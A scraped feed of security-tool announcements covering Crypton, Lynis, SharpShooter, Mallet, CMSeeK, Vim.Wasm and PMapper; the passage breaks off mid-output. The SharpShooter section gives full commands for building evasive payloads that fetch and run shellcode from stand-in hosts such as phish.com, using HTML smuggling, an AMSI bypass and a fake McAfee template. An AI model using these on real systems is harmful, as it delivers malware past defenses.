Crypton – Library Consisting Of Explanation And Implementation Of All The Existing Attacks On Various Encryption Systems, Digital Signatures, Hashing Algorithms

Crypton is an educational library to learn and practice Offensive and Defensive Cryptography. It is basically a collection of explanation and implementation of all the existing vulnerabilities and attacks on various Encryption Systems (Symmetric and Asymmetric), Digital Signatures, Message Authentication Codes and Authenticated Encryption Systems. Each attack is also supplemented with example challenges from “Capture The Flag" contests and their respective write-ups. Individuals who are already acquainted (or are into CTFs) with this field can use Crypton as a tool to solve challenges based on a particular existing vulnerability.The library will be continuously updated with attack explanations and CTF challenges!WARNING: The author in no way guarantees that the code is secure. The library is only meant for educational purposes and the code should not be used for implementing in real world. All the example scripts in the library are trivial implementations.There are different sections in this README:Motivation- What motivated me to create this libraryLibrary Structure- Directory structure of CryptonDomain Coverage- What all cryptosystems and attacks are covered in this libraryFuture Plans/TODO- Attacks/concepts that are to be included soonMotivationHelp CTF players and individuals interested in the field of Cryptography provide a platform for learning attacks in crypto and for experienced CTF players to practice challenges systematically divided into attacks associated with different sub-domains in crypto. Also, illustrate through various attack explanations how proper implementation of protocols is crucial.Library StructureDomain Coverage1. Block Ciphers S.No. Topic Explanation Impl./Exploit Challenge# 1 Block Cipher Basics- working of block ciphers, padding etc. [link] 2 Modes of Encryption- different modes of operation on block ciphers: ECB, CBC, CTR [link] 3 Block Size Detection- detect blocksize of a block cipher encrypting data on a remote service [link] 4 Mode Detection- detect type of mode of encryption: independent or dependent encryption of blocks [link] 5 ECB Byte at a Time- byte at a time decryption of a secret string running on a remote service encrypting input+secret in ECB mode [link] [link] 6 CBC IV Detection- detect the value of Initialisation Vector on a remote service that is encrypting our input using a block cipher in CBC mode [link] [link] 7 CBC Bit Flipping Attack- exploiting cookie generation mechanism to login as admin when cookie is generated using a block cipher in CBC mode [link] [link] 8 CBC Byte at a Time- byte at a time decryption of a secret string running on a remote service encrypting input+secret in ECB mode [link] [link] 9 CBC Padding Oracle Attack- decryption of data encrypted by a vulnerable service providing encryption/decryption [link] [link] 10 CTR Bit Flipping- exploiting cookie generation mechanism to login as admin when cookie is generated using a block cipher in CBC mode [link] [link] 2. RSA Encryption S.No. Topic Explanation Impl./Exploit Challenge# 1 Unpadded RSA Enc/Dec- key generation, distribution, encryption/decryption, verification of decryption formula and padding in RSA [link] 2 Direct Root Attack- attack on unpadded RSA with low public key exponent [link] 3 Fermat’s Factorisation- technique used to factor modulus n when p and q values are in proximity [link] [link] [link] 4 Pollard’s p-1 Factorisation- technique to factorise n when both of it’s factors p & q, p-1 and q-1 have very small prime divisors [link] [link] [link] 5 Common Modulus Attack- decrypt ciphertext when it’s corresponding plaintext is encrypted two different times with the same modulus n [link] [link] [link] 6 Common Prime Attack- retrieve factors of moduli n1 and n2 when they have a common factor  [link]  [link] 7 Wiener’s Attack- get value of decryption key exponent d when d < N0.25 [link] [link] [link] 8 Wiener's Attack Variant- get value of decryption key exponent d when d is a few bits greater than N0.25 or d < N0.25 [link]  [link]  [link] 9 Coppersmith's Attack- coppersmith's theorem, attack on stereotyped messages and factoring n with high bits known [link] [link] [link] 10 Franklin Reiter Related Message Attack- attack to retrieve related messages encrypted using the same modulus [link]  [link]  [link] 11 Hastad's Broadcast Attack- with extension- attack to retrieve a message broadcasted among different people, encrypted using same exponent but different moduli  [link] [link]- script needs to be fixed [link] 12 PKCS1-v1.5-Padded-RSA-Encryption/Decryption- ASN1 encoding, padded RSA encryption (needs to be fixed) 13 Intro-RSA-Challenges- basic challenges in RSA related to Number Theory [link]  [link] 3. Message Authentication Codes (MACs) S.No. Topic Explanation Impl./Exploit Challenge# 1 Message Authentication Code- internals and security analysis of MACs [link] 2 CBC MAC Forgery- generating two message M1 and M2 having the same CBC-MAC authentication tag [link]  [link] 3 Length Extension Attack on CBC-MAC- generate a valid authentication tag of message M1 || M2 (concatenation) given MAC(M1) [link] [link] 4. Discrete Logarithm Problem S.No. Topic Explanation Impl./Exploit Challenge# 1 DLP- cyclic groups, discrete logarithm problem, Baby-Step-Giant-Step algorithm [link]  [link] 2 Elliptic Curve DLP- defining identity element, inverse of a point, cyclic groups over points on an EC, Hasse's theorem, ECDLP [link] 5. ElGamal Encryption S.No. Topic Explanation Impl./Exploit Challenge# 1 ElGamal Cryptosystem- Encryption/Decryption- key generation, encryption, decryption in ElGamal Cryptosystem [link] [link] [link] 6. Authenticated Encryption (AE) S.No. Topic Explanation Impl./Exploit Challenge# 1 AE basics & internals- working of authenticated encryption [link] 2 AE with MACs- different techniques of implementing AE with MACs: Encrypt and MAC, MAC then encrypt and encrypt then MAC [link] 3 Authenticated Ciphers  [link] 4 AE with Associated Data  [link] 5 AES-GCM- encryption in AES-GCM, Wegman-Carter MAC [link] [link] 6 Forbidden Attack on AES-GCM- attack on AES-GCM due to nonce-reuse  [link] [link] 7. Elliptic Curves S.No. Topic Explanation Impl./Exploit Challenge# 1 Elliptic Curve Internals- defining Elliptic Curves, point addition, point doubling and scalar multiplication [link] 8. Digital Signatures S.No. Topic Explanation Impl./Exploit Challenge# 1 ElGamal Signatures- key generation, signature generation, signature verification and correctness of ElGamal Signature scheme [link] [link] [link] 2 Elliptic Curve DSA- signature generation, signature verification and correctness of signature algorithm [link] 3 Attack k-reuse ECDSA- forging of ECDSA signatures due to reuse of k  [link] 4 Unpadded RSA Digital Signatures- signature generation and verification in RSA digital signature scheme [link] [link] 5 PKCS1-v1.5 padded RSA Digital Signatures [link]  [link] 6 e=3 Bleichenbacher's Attack [link]  [link]  [link] TODORSA EncryptionChosen Ciphertext Attack on RSA Cryptosystem- Byte by Byte decryptionPadding Oracle Attack on PKCS1 padded RSA encryption systematFermat's FactorisationSieve ImprovementCoppersmith's AttackBoneh Durfee AttackHastad's Broadcast AttackImplementation of HBA on padded messagesPKCS1-v1.5 Padded RSA encryption[More to be added]AuthorAshutosh AhelleyaTwitter: https://twitter.com/ashutosha_Blog: https://masterpessimistaa.wordpress.comEmailID: [email protected] Crypton

Link: http://feedproxy.google.com/~r/PentestTools/~3/pV9GKrjPU_4/crypton-library-consisting-of.html

Lynis 2.6.8 – Security Auditing Tool for Unix/Linux Systems

We are excited to announce this major release of auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next of simplification improvements we made. There is a risk of breaking your existing configuration.Lynis is an open source security auditing tool. Used by system administrators, security professionals, and auditors, to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.Supported operating systemsThe tool has almost no dependencies, therefore it runs on almost all Unix-based systems and versions, including:AIXFreeBSDHP-UXLinuxMac OSNetBSDOpenBSDSolarisand othersIt even runs on systems like the Raspberry Pi and several storage devices!Installation optionalLynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use “./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). How it worksLynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report.StepsDetermine operating systemSearch for available tools and utilitiesCheck for Lynis updateRun tests from enabled pluginsRun security tests per categoryReport status of security scanBesides the data displayed on the screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.Opportunistic ScanningLynis scanning is opportunistic: it uses what it can find.For example, if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates so they can be scanned later as well.In-depth security scansBy performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!Use casesSince Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:Security auditingCompliance testing (e.g. PCI, HIPAA, SOx)Vulnerability detection and scanningSystem hardeningResources used for testingMany other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.Best practicesCISNISTNSAOpenSCAP dataVendor guides and recommendations (e.g. Debian Gentoo, Red Hat)Lynis PluginsPlugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.ChangelogUpgrade note## Lynis 2.6.8 (2018-08-23)### Changed- BOOT-5104 – improved parsing of boot parameters to init process- PHP-2372 – test all PHP files for expose_php and improved logging- Alpine Linux detection for Docker audit- Docker check now tests also for CMD, ENTRYPOINT, and USER configuration- Improved display in Docker output for showing which keys are used for signingDownload Lynis 2.6.8

Link: http://feedproxy.google.com/~r/PentestTools/~3/crZYwFyGbEM/lynis-268-security-auditing-tool-for.html

SharpShooter – Payload Generation Framework

SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw’s DotNetToJavaScript tool to invoke methods from the SharpShooter DotNet serialised object. Payloads can be retrieved using Web or DNS delivery or both; SharpShooter is compatible with the MDSec ActiveBreach PowerDNS project. Alternatively, stageless payloads with embedded shellcode execution can also be generated for the same scripting formats.SharpShooter payloads are RC4 encrypted with a random key to provide some modest anti-virus evasion, and the project includes the capability to integrate sandbox detection and environment keying to assist in evading detection.SharpShooter includes a predefined CSharp template for executing shellcode with staged and stageless payloads, but any CSharp code can be compiled and invoked in memory using reflection, courtesy of CSharp’s CodeDom provider.Finally, SharpShooter provides the ability to bundle the payload inside an HTML file using the Demiguise HTML smuggling technique.SharpShooter targets v2, v3 and v4 of the .NET framework which will be found on most end-user Windows workstations.Version 1.0 of SharpShooter introduced several new concepts, including COM staging, execution of Squiblydoo and Squiblytwo, as well as XSL execution. To acomplish this new functionality, several new flags were added; –com, –awl and –awlurl.Further information can be found on the MDSec blog post.Usage – Command Line Mode:SharpShooter is highly configurable, supporting a number of different payload types, sandbox evasions, delivery methods and output types.Running SharpShooter with the –help argument will produce the following output:usage: SharpShooter.py [-h] [–stageless] [–dotnetver ] [–com <com>] [–awl <awl>] [–awlurl <awlurl>] [–payload <format>] [–sandbox <types>] [–amsi <amsi>] [–delivery <type>] [–rawscfile <path>] [–shellcode] [–scfile <path>] [–refs <refs>] [–namespace <ns>] [–entrypoint <ep>] [–web <web>] [–dns <dns>] [–output <output>] [–smuggle] [–template <tpl>]optional arguments: -h, –help show this help message and exit –stageless Create a stageless payload –dotnetver <ver> Target .NET Version: 2 or 4 –com <com> COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote –awl <awl> Application Whitelist Bypass Technique: wmic, regsvr32 –awlurl <awlurl> URL to retrieve XSL/SCT payload –payload <format> Payload type: hta, js, jse, vba, vbe, vbs, wsf –sandbox <types> Anti-sandbox techniques: [1] Key to Domain (e.g. 1=CONTOSO) [2] Ensure Domain Joined [3] Check for Sandbox Artifacts [4] Check for Bad MACs [5] Check for Debugging –amsi <amsi> Use amsi bypass technique: amsienable –delivery <type> Delivery method: web, dns, both –rawscfile <path> Path to raw shellcode file for stageless payloads –shellcode Use built in shellcode execution –scfile <path> Path to shellcode file as CSharp byte array –refs <refs> References required to compile custom CSharp, e.g. mscorlib.dll,System.Windows.Forms.dll –namespace <ns> Namespace for custom CSharp, e.g. Foo.bar –entrypoint <ep> Method to execute, e.g. Main –web <web> URI for web delivery –dns <dns> Domain for DNS delivery –output <output> Name of output file (e.g. maldoc) –smuggle Smuggle file inside HTML –template <tpl> Name of template file (e.g. mcafee)Examples of some use cases are provided below:Stageless JavaScriptSharpShooter.py –stageless –dotnetver 4 –payload js –output foo –rawscfile ./raw.txt –sandbox 1=contoso,2,3Create a stageless JavaScript payload targeting version 4 of the .NET framework. This example will create a payload named foo.js in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts to enforce some sandbox evasion by keying execution to the CONTOSO domain, and checking for known sandbox/VM artifacts.Stageless HTASharpShooter.py –stageless –dotnetver 2 –payload hta –output foo –rawscfile ./raw.txt –sandbox 4 –smuggle –template mcafeeCreate a stageless HTA payload targeting version 2/3 of the .NET framework. This example will create a payload named foo.hta in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts to enforce some sandbox evasion by checking for known virtual MAC addresses. A HTML smuggling payload will also be generated named foo.html in the output directory. This payload will use the example McAfee virus scan template.Staged VBSSharpShooter.py –payload vbs –delivery both –output foo –web http://www.foo.bar/shellcode.payload –dns bar.foo –shellcode –scfile ./csharpsc.txt –sandbox 1=contoso –smuggle –template mcafee –dotnetver 4This example creates a staged VBS payload that performs both Web and DNS delivery. The payload will attempt to retrieve a GZipped CSharp file that executes the shellcode supplied as a CSharp byte array in the csharpsc.txt file. The CSharp file used is the built-in SharpShooter shellcode execution template. The payload is created in the output directory named foo.payload and should be hosted on http://www.foo.bar/shellcode.payload. The same file should also be hosted on the bar.foo domain using PowerDNS to serve it. The VBS file will attempt to key execution to the CONTOSO domain and will be embedded in a HTML file using the HTML smuggling technique with the McAfee virus scanned template. The resultant payload is stored in the output directory named foo.html.Custom CSharp inside VBSSharpShooter.py –dotnetver 2 –payload js –sandbox 2,3,4,5 –delivery web –refs mscorlib.dll,System.Windows.Forms.dll –namespace MDSec.SharpShooter –entrypoint Main –web http://www.phish.com/implant.payload –output malicious –smuggle –template mcafeeThis example demonstrates how to create a staged JS payload that performs web delivery, retrieving a payload from http://www.phish.com/implant.payload. The generated payload will attempt sandbox evasion, and attempt to compile the retrieved payload which requires mscorlib.dll and System.Windows.Forms.dll as DLL references. The Main method in the MDSec.SharpShooter namespace will be executed on successful compilation.Creation of a Squiblytwo VBSSharpShooter.py –stageless –dotnetver 2 –payload vbs –output foo –rawscfile ./x86payload.bin –smuggle –template mcafee –com outlook –awlurl http://192.168.2.8:8080/foo.xslThis example creates a VBS smuggled COM stager that uses the Outlook.CreateObject() COM method as a primitive to execute wmic.exe to execute a hosted stylesheet. The –awl parameter is not used by defaults to wmic.Creation of a XSL HTASharpShooter.py –stageless –dotnetver 2 –payload hta –output foo –rawscfile ./x86payload.bin –smuggle –template mcafee –com xslremote –awlurl http://192.168.2.8:8080/foo.xslThis example creates a HTA smuggled file that uses the the XMLDOM COM interface to retrieve and execute a hosted stylesheet.Author and CreditsAuthor: Dominic Chell, MDSec ActiveBreach @domchell and @mdseclabsCredits:@tiraniddo: James Forshaw for [email protected]: for [email protected]: Rich Warren for [email protected] and @ChrisTruncer: Brandon Arvanaghi and Chris Truncer for [email protected]: Documentation for Squiblydoo and Squiblytwo techniquesDownload SharpShooter

Link: http://feedproxy.google.com/~r/PentestTools/~3/KJriJP1hJA4/sharpshooter-payload-generation.html

Mallet – A Framework For Creating Proxies

Mallet is a tool for creating proxies for arbitrary protocols, along similar lines to the familiar intercepting web proxies, just more generic.It is built upon the Netty framework, and relies heavily on the Netty pipeline concept, which allows the graphical assembly of graphs of handlers. In the Netty world, handler instances provide frame delimitation (i.e. where does a message start and end), protocol decoding and encoding (converting a stream of bytes into Java objects, and back again, or converting a stream of bytes into a different stream of bytes – think compression and decompression), and higher level logic (actually doing something with those objects).By following the careful separation of Codecs from Handlers that actually manipulate the messages, Mallet can benefit from the large library of existing Codecs, and avoid reimplementation of many protocols. The final piece of the puzzle is provided by a Handler that copies messages received on one pipeline to another pipeline, proxying those messages on to their final destination.Of course, while the messages are within Mallet, they can easily be tampered with, either with custom Handlers written in Java or a JSR-223 compliant scripting language, or manually, using one of the provided editors.You can get an idea of the available codecs by looking at the Netty source at GitHub, under the codec* directories.Building MalletMallet makes use of Maven, so compiling the code is a matter ofmvn packageTo run it:cd target/java -jar mallet-1.0-SNAPSHOT-spring-boot.jarThere are a few sample graphs provided in the examples/ directory. The JSON graphs expect a JSON client to connect to Mallet on localhost:9998/tcp, with the real server at localhost:9999/tcp. Only the last JSON graph (json5.mxe) makes any assumptions about the structure of the JSON messages being passed, so they should be applicable to any app that sends JSON messages.The demo.mxe shows a complex graph, with two pipelines, both TCP and UDP. The TCP pipeline is built to support HTTP and HTTPS on ports 80 and 443 respectively, as well as WebSockets, while relaying any other traffic directly to its destination. The UDP pipeline is built to process DNS requests on localhost:1053/udp, replace queries for google.com with queries for www.sensepost.com, and forward the requests on to Google DNS servers.Download Mallet

Link: http://feedproxy.google.com/~r/PentestTools/~3/uEIqUbaTQy4/mallet-framework-for-creating-proxies.html

CMSeeK v1.0.9 – CMS Detection And Exploitation Suite (Scan WordPress, Joomla, Drupal And 100 Other CMSs)

What is a CMS?A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: WordPress, Joomla, Drupal etc.Release History- Version 1.0.9 [21-08-2018]- Version 1.0.8 [14-08-2018]- Version 1.0.7 [07-08-2018]- Version 1.0.6 [23-07-2018]- Version 1.0.5 [19-07-2018]- Version 1.0.4 [17-07-2018]- Version 1.0.3 [06-07-2018]- Version 1.0.2 [06-07-2018]- Version 1.0.1 [19-06-2018]- Version 1.0.0 [15-06-2018]Changelog FileFunctions Of CMSeek:Basic CMS Detection of over 30 CMSDrupal version detectionAdvanced WordPress ScansDetects VersionUser EnumerationPlugins EnumerationTheme EnumerationDetects Users (3 Detection Methods)Looks for Version Vulnerabilities and much more!Advanced Joomla ScansVersion detectionBackup files finderAdmin page finderCore vulnerability detectionDirectory listing checkConfig leak detectionVarious other checksModular bruteforce systemUse pre made bruteforce modules or create your own and integrate with itRequirements and Compatibility:CMSeeK is built using python3, you will need python3 to run this tool and is compitable with unix based systems as of now. Windows support will be added later. CMSeeK relies on git for auto-update so make sure git is installed.Installation and Usage:It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands:git clone https://github.com/Tuhinshubhra/CMSeeKcd CMSeeKFor guided scanning:python3 cmseek.pyElse:python3 cmseek.py -u […]Help menu from the program:USAGE: python3 cmseek.py (for a guided scanning) OR python3 cmseek.py [OPTIONS] <Target Specification>SPECIFING TARGET: -u URL, –url URL Target Url -l LIST, -list LIST path of the file containing list of sites for multi-site scan (comma separated)USER AGENT: -r, –random-agent Use a random user agent –user-agent USER_AGENT Specify custom user agentOUTPUT: -v, –verbose Increase output verbosityVERSION & UPDATING: –update Update CMSeeK (Requires git) –version Show CMSeeK version and exitHELP & MISCELLANEOUS: -h, –help Show this help message and exit –clear-result Delete all the scan resultEXAMPLE USAGE: python3 cmseek.py -u example.com # Scan example.com python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated) python3 cmseek.py -u example.com –user-agent Mozilla 5.0 # Scan example.com using custom user-Agent Mozilla is 5.0 used here python3 cmseek.py -u example.com –random-agent # Scan example.com using a random user-Agent python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.comChecking For Update:You can check for update either from the main menu or use python3 cmseek.py –update to check for update and apply auto update.P.S: Please make sure you have git installed, CMSeeK uses git to apply auto update.Detection Methods:CMSeek detects CMS via the following:HTTP HeadersGenerator meta tagPage source coderobots.txtSupported CMSs:CMSeeK currently can detect 40 CMSs, you can find the list on cmss.py file which is present in the cmseekdb directory. All the cmss are stored in the following way: cmsID = { ‘name’:’Name Of CMS’, ‘url’:’Official URL of the CMS’, ‘vd’:’Version Detection (0 for no, 1 for yes)’, ‘deeps’:’Deep Scan (0 for no 1 for yes)’ }Scan Result:All of your scan results are stored in a json file named cms.json, you can find the logs inside the Result\<Target Site> directory, and as of the bruteforce results they’re stored in a txt file under the site’s result directory as well.Here is an example of the json report log:Bruteforce Modules:CMSeek has a modular bruteforce system meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly but in case you already figured out how to (pretty easy once you analyze the pre-made modules) all you need to do is this:Add a comment exactly like this # <Name Of The CMS> Bruteforce module. This will help CMSeeK to know the name of the CMS using regex Add another comment ### cmseekbruteforcemodule, this will help CMSeeK to know it is a module Copy and paste the module in the brutecms directory under CMSeeK’s directory Open CMSeeK and Rebuild Cache using U as the input in the first menu. If everything is done right you’ll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK.Need More Reasons To Use CMSeeK?If not anything you can always enjoy exiting CMSeeK (please don’t), it will bid you goodbye in a random goodbye message in various languages.Also you can try reading comments in the code those are pretty random and weird!!!Screenshots:Download CMSeeK

Link: http://feedproxy.google.com/~r/PentestTools/~3/NGGMG4yYz8A/cmseek-v109-cms-detection-and.html

Vim.Wasm – Vim Editor Ported To WebAssembly

This project is an experimental fork of Vim editor by @rhysd to compile it into WebAssembly using emscripten and binaryen.Try it with your browserNOTICESPlease access from a desktop browser (Chrome/Firefox/Safari/Edge). Safari seems the best on macOS.Please avoid slow networks. Your browser will fetch total of around 1MB files.vim.wasm takes key inputs from DOM keydown event. Please disable your browser extensions which affect key inputs (incognito mode would be the best).This project is very early phase of experiment. Currently only tiny features are supported. More features will be implemented (please see TODO section). And you may notice soon on trying it… it’s buggy :)If inputting something does not change anything, please try to click somewhere in the page. Vim may have lost the focus.You can try vimtutor by :e tutor.The goal of this project is running Vim editor on browser by compiling Vim C sources into WebAssembly.How It WorksBuild ProcessWebAssembly frontend for Vim is implemented as a new GUI frontend. C sources are compiled to each LLVM bitcode files and then they are linked to one bitcode file vim.bc by emcc. emcc finally compiles the vim.bc into vim.wasm binary using binaryen and generates HTML/JavaScript runtime.The difference I faced at first was the lack of terminal library such as ncurses. I modified configure script to ignore the terminal library check. It’s OK since GUI frontend for Wasm is always used instead of CUI frontend. I needed many workarounds to pass configure checks.emscripten provides Unix-like environment. So os_unix.c can support Wasm. However, some features are not supported by emscripten. I added many #ifdef FEAT_GUI_WASM guards to disable features which cannot be supported by Wasm (i.e. fork (2) support, PTY support, signal handlers are stubbed, …etc).I created gui_wasm.c heavily referencing gui_mac.c and gui_w32.c. Event loop (gui_mch_update() and gui_mch_wait_for_chars()) is simply implemented with sleep(). And almost all UI rendering events arer passed to JavaScript layer by calling JavaScript functions from C thanks to emscripten.C sources are compiled (with many optimizations) into LLVM bitcode with Clang which is integrated to emscripten. Then all bitcode files (.o) are linked to one bitcode file vim.bc with llvm-link linker (also integrated to emscripten).Finally I created JavaScript runtime to draw the rendering events sent from C. It is created as wasm/runtime.ts using emscripten API. It draws Vim screen to

element with rendering events such as ‘draw text’, ‘scroll screen’, ‘set foreground color’, ‘clear rect’, …etc.emcc (emscripten’s C compiler) compiles the vim.bc into vim.wasm, vim.js and vim.html with preloaded Vim runtime files (i.e. colorscheme) using binaryen. Runtime files are put on a virtual file system provided by emscripten on a browser.Now hosting vim.html with a web server and accessing to it with browser opens Vim. It works.User InteractionUser interaction is very simple. You input something with keyboard. Browser takes it as KeyboardEvent on keydown event and JavaScript runtime sends the input to Wasm thanks to emscripten’s JS to C API. Sent input is added to a buffer in C layer. It affects the editor’s state.An editor core implemented in C calculates rendering events and sends it to JavaScript layer thanks to emscripten’s C to JS API. JavaScript runtime receives rendering events and stores them into a queue. On animation frames, it draws them to <canvas/> element in the web page.Finally you can see the rendered results in the page.Download Vim.Wasm

Link: http://feedproxy.google.com/~r/PentestTools/~3/1vJYKge35tI/vimwasm-vim-editor-ported-to-webassembly.html

PMapper – A Tool For Quickly Evaluating IAM Permissions In AWS

A project to speed up the process of reviewing an AWS account’s IAM configuration.PurposeThe goal of the AWS IAM auth system is to apply and enforce access controls on actions and resources in AWS. This tool helps identify if the policies in place will accomplish the intents of the account’s owners.AWS already has tooling in place to check if policies attached to a resource will permit an action. This tool builds on that functionality to identify other potential paths for a user to get access to a resource. This means checking for access to other users, roles, and services as ways to pivot.How to UseDownload this repository and install its dependencies with pip install -r requirements.txt .Ensure you have graphviz installed on your host.Setup an IAM user in your AWS account with a policy that grants the necessary permission to run this tool (see the file mapper-policy.json for an example). The ReadOnlyAccess managed policy works for this purpose. Grab the access keys created for this user.In the AWS CLI, set up a profile for that IAM user with the command: aws configure –profile where <profile_name> is a unique name.Run the command python pmapper.py –profile <profile_name> graph to begin pulling data about your account down to your computer.GraphingPrincipal Mapper has a graph subcommand, which does the heavy work of going through each principal in an account and finding any other principals it can access. The results are stored at ~/.principalmap and used by other subcommands.QueryingPrincipal Mapper has a query subcommand that runs a user-defined query. The queries can check if one or more principals can do a given action with a given resource. The supported queries are:”can <Principal> do <Action> [with <Resource>]""who can do <Action> [with <Resource>]""preset <preset_query_name> <preset_query_args>"The first form checks if a principal, or any other principal accessible to it, could perform an action with a resource (default wildcard). The second form enumerates all principals that are able to perform an action with a resource.Note the quotes around the full query, that’s so the argument parser knows to take the whole string.Note that <Principal> can either be the full ARN of a principal or the last part of that ARN (user/… or role/…).PresetsThe existing preset is priv_esc or change_perms, which have the same function. They describe which principals have the ability to change their own permissions. If a principal is able to change their own perms, then it effectively has unlimited perms.VisualizingThe visualize subcommand produces a DOT and SVG file that represent the nodes and edges that were graphed.To create the DOT and SVG files, run the command: python pmapper.py visualizeCurrently the output is a directed graph, which collates all the edges with the same source and destination nodes. It does not draw edges where the source is an admin. Nodes for admins are colored blue. Nodes for users with the ability to access admins are colored red (potential priv-esc risk).Sample OutputPulling a [email protected]:~/Documents/projects/Skywalker$ python pmapper.py graphUsing profile: skywalkerPulling data for account [REDACTED]Using principal with ARN arn:aws:iam::[REDACTED]:user/TestingSkywalker[+] Starting EC2 checks.[+] Starting IAM checks.[+] Starting Lambda checks.[+] Starting CloudFormation checks.[+] Completed CloudFormation checks.[+] Completed EC2 checks.[+] Completed Lambda checks.[+] Completed IAM checks.Created an AWS Graph with 16 nodes and 53 edges[NODES]AWSNode("arn:aws:iam::[REDACTED]:user/AdminUser", properties={u’is_admin’: True, u’type’: u’user’})AWSNode("arn:aws:iam::[REDACTED]:user/EC2Manager", properties={u’is_admin’: False, u’type’: u’user’})AWSNode("arn:aws:iam::[REDACTED]:user/LambdaDeveloper", properties={u’is_admin’: False, u’type’: u’user’})AWSNode("arn:aws:iam::[REDACTED]:user/LambdaFullAccess", properties={u’is_admin’: False, u’type’: u’user’})AWSNode("arn:aws:iam::[REDACTED]:user/PowerUser", properties={u’is_admin’: False, u’rootstr’: u’arn:aws:iam::[REDACTED]:root’, u’type’: u’user’})AWSNode("arn:aws:iam::[REDACTED]:user/S3ManagementUser", properties={u’is_admin’: False, u’type’: u’user’})AWSNode("arn:aws:iam::[REDACTED]:user/S3ReadOnly", properties={u’is_admin’: False, u’type’: u’user’})AWSNode("arn:aws:iam::[REDACTED]:user/TestingSkywalker", properties={u’is_admin’: False, u’type’: u’user’})AWSNode("arn:aws:iam::[REDACTED]:role/AssumableRole", properties={u’is_admin’: False, u’type’: u’role’, u’name’: u’AssumableRole’})AWSNode("arn:aws:iam::[REDACTED]:role/EC2-Fleet-Manager", properties={u’is_admin’: False, u’type’: u’role’, u’name’: u’EC2-Fleet-Manager’})AWSNode("arn:aws:iam::[REDACTED]:role/EC2Role-Admin", properties={u’is_admin’: True, u’type’: u’role’, u’name’: u’EC2Role-Admin’})AWSNode("arn:aws:iam::[REDACTED]:role/EC2WithS3ReadOnly", properties={u’is_admin’: False, u’type’: u’role’, u’name’: u’EC2WithS3ReadOnly’})AWSNode("arn:aws:iam::[REDACTED]:role/EMR-Service-Role", properties={u’is_admin’: False, u’type’: u’role’, u’name’: u’EMR-Service-Role’})AWSNode("arn:aws:iam::[REDACTED]:role/LambdaRole-S3ReadOnly", properties={u’is_admin’: False, u’type’: u’role’, u’name’: u’LambdaRole-S3ReadOnly’})AWSNode("arn:aws:iam::[REDACTED]:role/ReadOnlyWithLambda", properties={u’is_admin’: False, u’type’: u’role’, u’name’: u’ReadOnlyWithLambda’})AWSNode("arn:aws:iam::[REDACTED]:role/UpdateCredentials", properties={u’is_admin’: False, u’type’: u’role’, u’name’: u’UpdateCredentials’})[EDGES](0,1,’ADMIN’,’can use existing administrative privileges to access’)(0,2,’ADMIN’,’can use existing administrative privileges to access’)(0,3,’ADMIN’,’can use existing administrative privileges to access’)(0,4,’ADMIN’,’can use existing administrative privileges to access’)(0,5,’ADMIN’,’can use existing administrative privileges to access’)(0,6,’ADMIN’,’can use existing administrative privileges to access’)(0,7,’ADMIN’,’can use existing administrative privileges to access’)(0,8,’ADMIN’,’can use existing administrative privileges to access’)(0,9,’ADMIN’,’can use existing administrative privileges to access’)(0,10,’ADMIN’,’can use existing administrative privileges to access’)(0,11,’ADMIN’,’can use existing administrative privileges to access’)(0,12,’ADMIN’,’can use existing administrative privileges to access’)(0,13,’ADMIN’,’can use existing administrative privileges to access’)(0,14,’ADMIN’,’can use existing administrative privileges to access’)(0,15,’ADMIN’,’can use existing administrative privileges to access’)(10,0,’ADMIN’,’can use existing administrative privileges to access’)(10,1,’ADMIN’,’can use existing administrative privileges to access’)(10,2,’ADMIN’,’can use existing administrative privileges to access’)(10,3,’ADMIN’,’can use existing administrative privileges to access’)(10,4,’ADMIN’,’can use existing administrative privileges to access’)(10,5,’ADMIN’,’can use existing administrative privileges to access’)(10,6,’ADMIN’,’can use existing administrative privileges to access’)(10,7,’ADMIN’,’can use existing administrative privileges to access’)(10,8,’ADMIN’,’can use existing administrative privileges to access’)(10,9,’ADMIN’,’can use existing administrative privileges to access’)(10,11,’ADMIN’,’can use existing administrative privileges to access’)(10,12,’ADMIN’,’can use existing administrative privileges to access’)(10,13,’ADMIN’,’can use existing administrative privileges to access’)(10,14,’ADMIN’,’can use existing administrative privileges to access’)(10,15,’ADMIN’,’can use existing administrative privileges to access’)(1,9,’EC2_USEPROFILE’,’can create an EC2 instance and use an existing instance profile to access’)(1,10,’EC2_USEPROFILE’,’can create an EC2 instance and use an existing instance profile to access’)(1,11,’EC2_USEPROFILE’,’can create an EC2 instance and use an existing instance profile to access’)(4,9,’EC2_USEPROFILE’,’can create an EC2 instance and use an existing instance profile to access’)(4,10,’EC2_USEPROFILE’,’can create an EC2 instance and use an existing instance profile to access’)(4,11,’EC2_USEPROFILE’,’can create an EC2 instance and use an existing instance profile to access’)(3,13,’LAMBDA_CREATEFUNCTION’,’can create a Lambda function and pass an execution role to 